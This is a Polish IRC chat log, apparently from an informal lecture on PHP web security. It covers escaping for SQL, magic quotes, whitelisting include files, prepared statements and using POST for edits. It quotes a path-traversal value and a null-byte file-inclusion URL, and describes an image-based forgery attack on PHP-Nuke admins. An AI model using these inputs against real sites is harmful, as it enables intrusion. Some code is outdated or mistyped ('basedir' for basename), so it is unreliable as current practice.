20:58 <@Vengeance> $escaped_item = mysql_escape_string($item);
20:58 <@Vengeance> printf("Escaped string: %s\n", $escaped_item);
20:58 <@Vengeance> ?>
20:58 <@Vengeance> tu macie efekt co zrobi funckja...
20:58 <@Vengeance> niby to samo co addslashes() ale roznica jak juz powiedzialem tkwi w tym
20:58 <@Vengeance> ze przy wyciaganiu danych (jesli uzywalismy addslashes) mamy smieci
20:58 <@Vengeance> w stylu dodatkowych znakow \
20:59 <@Vengeance> jezeli przez przypadek damy za duzo razy addslashes()
20:59 <@Vengeance> to robi sie syf
20:59 <@Vengeance> i ciezko to odwrocic
20:59 <@Vengeance> phoenix__: zdejmuj to -m :] to nie wyklad :D
20:59 <@Vengeance> nie bede opisywac wzystkiego nie jestem przygotowany ;]
20:59 <@Vengeance> daje wskazowki, reszta w manualu ;]
20:59 < Heretic> to z mysql usuwa zupelnie "\" ??
20:59 < Astarot> ale jest przeciez funkcja stripslashes
21:00 < faxe> w manualu nawet nie napisali o tej dyrektywie ... \:
21:00 < faxe> a potem ludzi sie dziwuja skad podwojne bakslasze
21:00 <@Vengeance> wiec tak:
21:00 < faxe> wylaczaja i robio luke gdy np. przeniosa kod na drugi serwer
21:00 <@Vengeance> powiedzmy ze chcemy
21:00 <@Vengeance> zrobic sajt z formularzem
21:00 <@Vengeance> i go zabezpieczyc
21:00 <@Vengeance> formularz pobiera jakas tresc
21:00 <@Vengeance> i ja zapisuje
21:00 <@Vengeance> do bazy poprzez INSERT
21:00 < faxe> function dodajEwSlasze($p) { return get_magic_quotes_gpc() ? $p : addslashes($p); }
21:00 < faxe> function usunEwSlasze($p) { return get_magic_quotes_gpc() ? stripslashes($p) : $p; }
21:00 <@Vengeance> wiec w skrypcie najpierw
21:00 <@Vengeance> trzeba sprawdzic
21:01 < faxe> Vengeance: juz podalem kod funkcji
21:01 <@Vengeance> czy nei ma wlaczonego magic_quotes_gpc = on
21:01 <@phoenix__> Vengeance: tyo moze ty zrobisz nastepny wyklady?
21:01 <@Vengeance> w php.ini
21:01 < faxe> dodaje i usuwa slasze tylko wtedy, gdy potrzeba
21:01 <@Evill> bo moj byl przejebany :D ;]
21:01 <@Vengeance> faxe:
21:01 <@Vengeance> tak...
21:01 <@Vengeance> ale lepiej jest
21:01 <@Vengeance> usunac slashe
21:01 < Heretic> zaraz zaraz Evill , a przy wylaczeniu register_globals to wtedy linki ?cos=cos nie dzialaja ?
21:01 <@Vengeance> czyli petla po tablicach
21:01 <@Vengeance> usuwajaca
21:01 * Vengeance znajdzie kod i wklei
21:01 <@Vengeance> w8
21:01 < faxe> oczywiscie dzialaja tylko na zmiennych z GET, POST - na wewnetrznych trzeba zawsze dawac addslashes
21:02 <@Evill> heretick : dzialaja ale niezaincludujesz jzu indego skrypt wtedy tworza sie bledy w fopen
21:02 < faxe> Vengeance: nie usuwaj na zas bo np. ktos CHCE dodac do bazy ciag \' <-- dokladnie taki
21:02 < adam_i> A po co zawsze addslashes
21:02 < faxe> to Twoj skrypt zniszczy jego plonne marzenia
21:02 <@Evill> typi index.php?zmienna=index.php
21:02 <@Evill> transwer zzera
21:02 < Heretic> czyli wtedy dziala tylko include tak jakby znajdujace sie na serwerze only ?
21:02 <@Vengeance> nieprawda
21:02 <@Evill> nie ?
21:02 < faxe> <@Vengeance> ale lepiej jest
21:02 < faxe> .:21:14:19:. <@Vengeance> usunac slashe
21:03 <@Vengeance> tak...
21:03 <@Vengeance> po sprawdzeniu
21:03 <@Evill> heretick: tak
21:03 <@Vengeance> czy magic_quotes
21:03 <@Vengeance> == On
21:03 <@Vengeance> wtedy jebgo slash
21:03 < konradvme> Vengeance : nie kazdy ma dostep do php.ini, nie mowimy o bezpieczenstwie localhosta
21:03 <@Vengeance> ten wymarzony
21:03 <@Vengeance> bedzie postaci
21:03 <@Vengeance> \\
21:03 <@Vengeance> konradvme:
21:03 <@Vengeance> ini_set()
21:03 <@Evill> wic ja zawsze biore na GEt i if case wtedy czuje sie bezpieczny :)
21:03 <@Vengeance> a ini_get
21:03 <@Vengeance> jest dostepne zawsze
21:03 < faxe> konradvme: funkcja get_magic_quotes_gpc() !!!!!!!!!!
21:03 <@Vengeance> pozatym to co wskazal faxe
21:03 < konradvme> faxe wiem
21:03 <@Vengeance> tez jest good
21:03 < faxe> no wienc d:
21:04 < Heretic> no ale jesli mamy np. GET, no to tam tez mozna wstawic bajerki typu "onet.pl" no wiec jak dokladnie sprawdzac takie dane ?
21:05 <@Vengeance> 1. jezeli magic_quotes_gpc == On - usuwamy to co zrobil... czyli dane z tablic GET/POST/COOKIE filtrujemy przez stripslashes()
21:05 <@Vengeance> 2. wszystkie dane wsadzane do zapytania wsadzamy posrednio... wczesniej odpowiednio filtrujac
21:05 < faxe> Heretic: tablica dozwolonych inkluduw albo rygorytyczny regexp
21:05 <@Vengeance> 3. nie zawsze trzeba escapowac danych... czasem wystarczy sprawdzenie czy zmienna jest liczba itd...
21:06 <@Vengeance> 4. jezeli wstawiamy tresc (a nie liczby) to juz escapeujemy poprzez mysql_escape_string()
21:06 < Heretic> Faxe - taka tablice robic samemu czy sa gdzies ow zakazane slowa dostepne?
21:06 <@Vengeance> 5. przy wyciaganiu tej tresci zapyatniem NIE ROBIMY NIC dodatkowego....
21:06 < konradvme> heteric, $strony = array('nazwa' => 'strona1.php', 'nazwa2' => 'strona2.php');
21:06 < faxe> Heretic: najlepiej samemu - wpisuje sie tylko to co dozwolone
21:06 < Astarot> ja zawsze robilem:url strony w tablicy a zmienna jako index i chyba jest bezpiecznie
21:06 <@Vengeance> przy addslashes() musielibysmy wyciagniete dane filtrowac ponownie stripslashes() - a po co
21:06 < Heretic> no to wtedy lepiej jechac na "case" bo i bezpieczniej i masz default na kazde inne slowo
21:06 <@Vengeance> pozatym
21:06 <@Vengeance> polecam korzystanie
21:07 <@Vengeance> z abstrakcji na bazy danych
21:07 <@Vengeance> jak PDO (dostepne w php5.1 standardowo)
21:07 <@Vengeance> czy Creole
21:07 <@Vengeance> ktore same zajmuja sie sprawa bezpieczenstwa
21:07 < konradvme> a pozniej sprawdzasz czy isset($strony['.$_GET['strona'].'])
21:07 <@Vengeance> my podajemy tylko jakiego typu danych oczekujemy
21:07 < faxe> Heretic: case jest wielgasny, wyszukiwanie tablicy i if() o wiele krotsze
21:07 <@Evill> faxe : ale bezpieczniejszy
21:07 < Heretic> wielgasny ? to zalezy ;) mozw i wielki ale bezpieczny :]
21:07 <@Vengeance> w przypadku
21:07 < faxe> hahaha LOL
21:08 <@Vengeance> Creole
21:08 < konradvme> Heretic: taka tablica jest czytelniejsza i latwiejsza w obsludze
21:08 <@Vengeance> wykonanie bezpiezcnego zapytania
21:08 < faxe> LOL do Evill
21:08 <@Vengeance> wyglada np. tak
21:08 < faxe> a czym sie roznic niby
21:08 < faxe> po prostu sposobem implementacji
21:08 <@Vengeance> public function Update($aNote)
21:08 <@Vengeance> {
21:08 <@Vengeance> $stmt = self::$DB->PrepareStatement('UPDATE notes SET '.
21:08 <@Vengeance> ' Title = ?, '.
21:08 <@Vengeance> ' Body = ? '.
21:08 <@Vengeance> 'WHERE notes.ID = ? '
21:08 <@Vengeance> );
21:08 <@Vengeance> $stmt->SetString(1, $aNote['Title']);
21:08 <@Vengeance> $stmt->SetString(2, $aNote['Body']);
21:08 <@Vengeance> $stmt->SetInt(3, $aNote['ID']);
21:08 <@Vengeance> $r = $stmt->ExecuteUpdate();
21:08 < faxe> w switch masz swoje warunki w kejsach a w tablicy jako pola/klucze tablicy
21:08 < faxe> ot, cala roznica
21:08 < konradvme> Vengeance ;]
21:08 <@Evill> jak kto woli
21:09 < Heretic> no ale zeby dodac do tablicy trzeba sie troche posrac :) a tak tylko case 'X' kod break; i wsio :]
21:09 < faxe> Vengeance: $DB - instancja jakiej to jest klasy
21:09 < faxe> bo widze, ze ma metody jak w javie
21:09 < faxe> ?
21:09 < faxe> z PEAR-a cos pewnie
21:09 < faxe> Heretic: w switchu tez cza dodac nowa pozycje
21:10 <@Vengeance> co do include
21:10 <@Vengeance> define('DIR', 'pages/');
21:10 <@Vengeance> define('EXT', '.php');
21:10 <@Vengeance> $page = basedir($_GET['inc']);
21:10 <@Vengeance> if(file_exists(DIR . $page . EXT))
21:10 <@Vengeance> {
21:10 <@Vengeance> include(DIR . $page . EXT);
21:10 <@Vengeance> }
21:10 <@Vengeance> else
21:10 <@Vengeance> include(DIR . 'glowna' . EXT);
21:10 <@Vengeance> to jest w miare bezpieczne
21:10 <@Vengeance> o ile
21:10 < Heretic> no tak ale po wieeeeelkim arrayu mozna sie pogubic a masz w swichu pieknie pokazane wszystko
21:10 <@Vengeance> magic_quotes_gpc == Off !
21:10 <@Vengeance> przy On w niektorych wersjach PHP byl ten sam blad co w Perl
21:10 <@Vengeance> i dalo sie robic
21:10 < faxe> Vengeance: ?page=../../../index
21:10 <@Vengeance> sajt.php?inc=plik.exe%00
21:11 <@Vengeance> faxe: nie zrobisz... basedir()
21:11 < faxe> %00 juz dawno jest pomijane
21:11 <@Vengeance> NIE :]
21:11 < konradvme> Heretic
21:11 < faxe> ah to zwracam honor <:
21:11 < konradvme> $strony_ok = array(
21:11 < konradvme> 'strona1' => 'lsajd.php',
21:11 < konradvme> 'strona2' => 'sdasd.php',
21:11 < konradvme> 'strona3' => 'sdfsdf.php'
21:11 < konradvme> );
21:11 <@Vengeance> tez tak myslalem
21:11 < konradvme> i co tu jest wielkiego?
21:11 <@Vengeance> ale nawet chyba w php 4.3
21:11 <@Vengeance> przy wlaczonym magic_quotes_gpc
21:11 <@Vengeance> i cos tam
21:11 <@Vengeance> to dzialalo :/
21:11 < faxe> %00 to sprawka apacza chyba
21:12 <@Vengeance> nie
21:12 <@Vengeance> php zle
21:12 < Heretic> chodzi mi ze pogubic sie mozna ;) jesli jest ciagiem pisane, zreszta jak kto woli, ja wole swich bo poprostu jest prostrzy
21:12 <@Vengeance> escapeowalo
21:12 < adam_i> %00 to php
21:12 < faxe> wstawial NULL do tablicy char[] i PHP uznawal to za koniec stringa
21:12 <@Vengeance> a to moze
21:12 <@Vengeance> nie wnikam
21:12 <@Vengeance> w apache ;p
21:12 <@Vengeance> a ja wole framework porzadny
21:13 <@Vengeance> i nie trzeba switchow pisac
21:13 <@Vengeance> ;p
21:13 < faxe> $dozwolone = array('jeden', 'dwa', 'trzy'); if(in_array($plik, $dozwolone)) include $$plik .'.php';
21:13 < faxe> a dla mnie to jest prostsze
21:13 <@Vengeance> tym bardziej
21:13 <@Vengeance> ze $dozwolone
21:13 <@Vengeance> moze pochodzic
21:13 <@Vengeance> z dowolnego zrodla :]
21:13 < faxe> s/\$\$/\$/ d:
21:13 <@Vengeance> a switch trzeba by przepisywac
21:14 < faxe> jak niby mozna zmodyfikowac zawartosc tablicy $dozwolone w tym kodzie
21:14 <@Vengeance> pozatym
21:14 <@Vengeance> wazna uwaga odnosnie
21:14 <@Vengeance> security
21:14 <@Vengeance> Wszystkie operacje Edit/Delete/Add
21:14 < faxe> ?dozwolone[]=chuj nie zadziala nawet przy rg=on
21:14 <@Vengeance> opierac na danych metoda POST !
21:14 < Heretic> tzn ?
21:14 < Heretic> a no tak rozumiem
21:15 <@Vengeance> na GET to mozna ino wyswietlanie danych wg parametru
21:15 <@Vengeance> i to tez o ile bedzie dobrze zabezpieczone :]
21:15 < Gynvael> Vengeance: hmm czemu post ?
21:15 <@Vengeance> a znasz slynny blad php nuke
21:15 < Gynvael> tzn jaka jest przewaga post nad get ?
21:15 <@phoenix__> Gynvael: priv
21:15 <@Vengeance> gdzie w forum
21:15 <@Vengeance> wstawiales obrazek
21:15 <@Vengeance> z odpwoiednim adresem
21:15 <@Vengeance> i jak admin wszedl
21:15 < adam_i> Post neiwidac w pasku
21:15 < Heretic> a czy da sie tak jakby przerobic get na post czyli przy pomocy get wstawic cos jako wysylanie formularza bez przerobki w kodzie php?
21:15 < adam_i> Tylko tyle
21:15 <@Vengeance> to dodawalo co kolwiek chciales :]
21:15 < faxe> Gynvael: ze POST nie keszuje sie w historii
21:15 < Gynvael> adam_i: hmmm no wlasnie ;>
21:15 <@Vengeance> mozna dac
21:15 < Gynvael> faxe: o ;> to juz jest cos ;>
21:15 <@Vengeance>

21:15 <@Vengeance> :D
21:15 < faxe> chcialbys, aby klikajac "Wstecz" skasowac dane z bazy po raz drugi?
21:15 <@Vengeance> przy POST nie da sie tak zrobic
21:16 < G0blin> Gynvael: zgadnij skad wracam :]
21:16 < Gynvael> Vengeance: ciekawy pomysl ;>
21:16 < Gynvael> mhm
21:16 < Gynvael> thx
21:16 <@Vengeance> ano
21:16 < Gynvael> G0blin: wcg
21:16 < G0blin> :D
21:16 < G0blin> Gynvael: yes
21:16 < G0blin> mowil juz px kto wygral? :>
21:16 < Gynvael> G0blin: slyszalem ze BM
21:16 < G0blin> anom
21:16 < G0blin> w finale byl z hermesem
21:16 < Gynvael> Vengeance: hmm a sie orietujesz moze
21:16 < G0blin> mu zvz
21:16 < Gynvael> Vengeance: o jakims wykorzystaniu innych metod ?
21:16 < Gynvael> Vengeance: np PUT etc ?
21:17 < Gynvael> Vengeance: bo ich troche jest z tego co kojarze
21:17 <@Vengeance> nie
21:17 < Gynvael> mhm ;> thx anyway
21:17 <@Vengeance> to raczej php
21:17 < faxe> z defaulta sa blokniete na apaczu
21:17 <@Vengeance> nie dotyczy ;]
21:17 < adam_i> A one chyba powylocnzne sa
21:17 < faxe> to sie webDAV nazywa
21:17 < faxe> to raczej NIE jest PHP
21:17 < Gynvael> Vengeance: hmm php chyba put do plikow umial obslugiwac
21:17 < Heretic> no napewno pisac dokladnie z czego to jest $_GET,$_POST,$_SESSION,$_COOKIE a nie dorazu $zmienna
21:17 < Gynvael> tzn PUT
21:17 < adam_i> Nie put normlanei idze np postem
21:18 < faxe> http://pl.wikipedia.org/wiki/Web-based_Distributed_Authoring_and_Versioning
21:18 <@Vengeance> pierwsza rzecz
21:18 < adam_i> * upload
21:18 <@Vengeance> to
21:18 <@Vengeance> register_globals = Off
21:18 < faxe> PUT idzie PUT-em, zadnum POST-em
21:18 <@Vengeance> error_reoprint (E_ALL)
21:18 <@Vengeance> *reporting
21:18 < faxe> ah Pehap rzeczywiscie zapytanie PUT tez umi odebrac
21:19 < faxe> przez STDIN (;
21:19 < Heretic> tzn :| ? PUT dziala jak GET ? bo jakos nie widzialem nigdy but
21:19 < Heretic> put*
21:19 < faxe> zamiast GET piszesz w zapytaniu PUT i URI pliku, jaki chcesz zapisac
21:19 < Gynvael> Heretic: PUt jest do umieszczania plikow na servie
21:19 <@Evill> put wysyla et odbiera :)
21:19 < Heretic> aha dzieki za doinformowanie
21:19 <@Evill> get*
21:19 < faxe> potem Content-Length: X i zawartosc pliku jako kontent
21:19 < r00uter> k
21:20 < faxe> http://www.ietf.org/rfc/rfc2518.txt
21:20 < Gynvael> Evill: hmm z tym ze put z content-length 0 i post z content-length 0 tez odbieraja ne ?
21:20 <@Evill> raczej nie
21:20 < Gynvael> tzn nie tylko z takim length
21:20 < Gynvael> ogoolnie odbieraja
21:20 <@Evill> neiwiem nieuzwywalem tego nigdy
21:21 < Gynvael> bo serv reaguje na nie tak jak na get, tyle ze pozwala dodatkowe informacje wyslac
21:21 <@Evill> leght 1 :p :)
21:21 <@Evill> tak mi sie wydaje
21:21 < faxe> Content-Length jak juz
21:21 < Heretic> btw. moze macie gdzies jakis tutek dla (mniej:P)inteligentnych ludzi dotyczacy OBIEKTOW w php ? bo poprostu ich nie uzywalem i nie uzywam :/
21:21 < faxe> i moze byc rowniez 0 - puste pliki tez przyjmuje, a jak
21:22 <@Vengeance> co rozumiesz przez tutek ;]
21:22 <@Evill> poco przyjmowac pusty plik faxe ?
21:22 < Heretic> tutek - opis jak to dziala, jak to zrobic i dokladnie wytlumaczone
21:22 < faxe> http://www.php.net/manual/pl/language.oop.php
21:22 <@Vengeance> bo semantyki to cie nic nie nauczy
21:22 < Heretic> bo sporo przeczytalem a i tak nie kapuje
21:22 < faxe> Heretic: to wymuszenie programowania obiektowego nic Ci nie pomoze
21:22 <@Vengeance> nom
21:22 < faxe> na sile nie wpychaj sie w to
21:22 < faxe> bo taka jest moda
21:23 <@Vengeance> rob na funkcjach wszystko
21:23 <@Vengeance> kiedys zobaczysz tego minusy
21:23 < Heretic> no wlasnie wiem
21:23 <@Vengeance> i zrozumiesz pusy oop ;]
21:23 <@Vengeance> *plusy
21:23 < Gynvael> faxe: hmm ale obiektowka nie jest taka zla ...
21:23 <@Vengeance> jest wspaniala :D
21:23 < Gynvael> ne
21:23 < Gynvael> wspaniale tez ne
21:23 < Gynvael> ;p
21:23 < Heretic> ale jakos obiekty , niby czesto stosowane przez duze korporacje (ot np. ipb) no ale nie kapuje tego this-> itd ... ciezko to zrozumiec, toporny jakis jestem :P
21:23 < faxe> jest narzedziem ale nie rozwiazaniem
21:23 <@Vengeance> Heretic:
21:24 < Sp3c0> Hi
21:24 <@Vengeance> a co tu rozumiec?
21:24 <@Vengeance> dzielisz sobie kod
21:24 <@Vengeance> na obiekty
21:24 <@Vengeance> tak jak w przyrodzie
21:24 <@Vengeance> masz stolik, fotel, monitor
21:24 < Sp3c0> o czym rozmawiacie ?
21:24 <@Vengeance> kazdy z nich ma wlasne atrybuty
21:24 <@Vengeance> kolor, material, cene
21:24 <@Vengeance> i metody:
21:24 <@Vengeance> wlaczy, wylacz, costam
21:24 <@Vengeance> robiac
21:24 <@Vengeance> $zmienna = new Obiekt();
21:24 < Heretic> wlacz fotel :) oryginalnie ... kontynuuj prosze :]
21:24 <@Vengeance> robisz ze $zmiennej "zywy twor"
21:25 < faxe> ( $zmienna =& new Obiekt(); pod PHP4 )
21:25 <@Vengeance> ktory procz wartosci
21:25 <@Vengeance> moze takze dokonywac roznych operacji
21:25 <@Vengeance> $zmienna ma tzw. "Stan"
21:25 <@Vengeance> do tej pory
21:25 < Gynvael> faxe: pod PHP5 to tez zadziala ?
21:25 < faxe> tak, ale bedzie Notice chyba
21:26 * Heretic proponuje : moze next wyklad gleeebiej o php - obiekty ^_^ ?
21:26 < Gynvael> faxe: czy trzeba robic jakies if(php_ver>=5) costma else costam
21:26 <@Vengeance> Gynvael:
21:26 <@Vengeance> php5
21:26 <@Vengeance> sam robi referencje
21:26 <@Vengeance> do wszystkiego
21:26 <@Vengeance> wiec &
21:26 <@Vengeance> nie potrzeba
21:26 < Gynvael> wogole ?
21:26 < Gynvael> czy w tym wypadku ?
21:26 <@Vengeance> do obiektow
21:26 < faxe> Gynvael: nie ... zazwyczaj piszac obiekty wie sie pod jaka wersje PHP
21:26 <@phoenix__> WIECIE CO MOZE SKONCZCIE TO , A TY Vengeance ZROB WYKLAD O PHP I BEZPIECZENISTWIE ZAAWANOSNYM
21:26 < Gynvael> Vengeance: tzn jak java ?
21:26 < faxe> jesli na niewiadoma to tylko w modelu PHP4
21:26 < Gynvael> faxe: mhm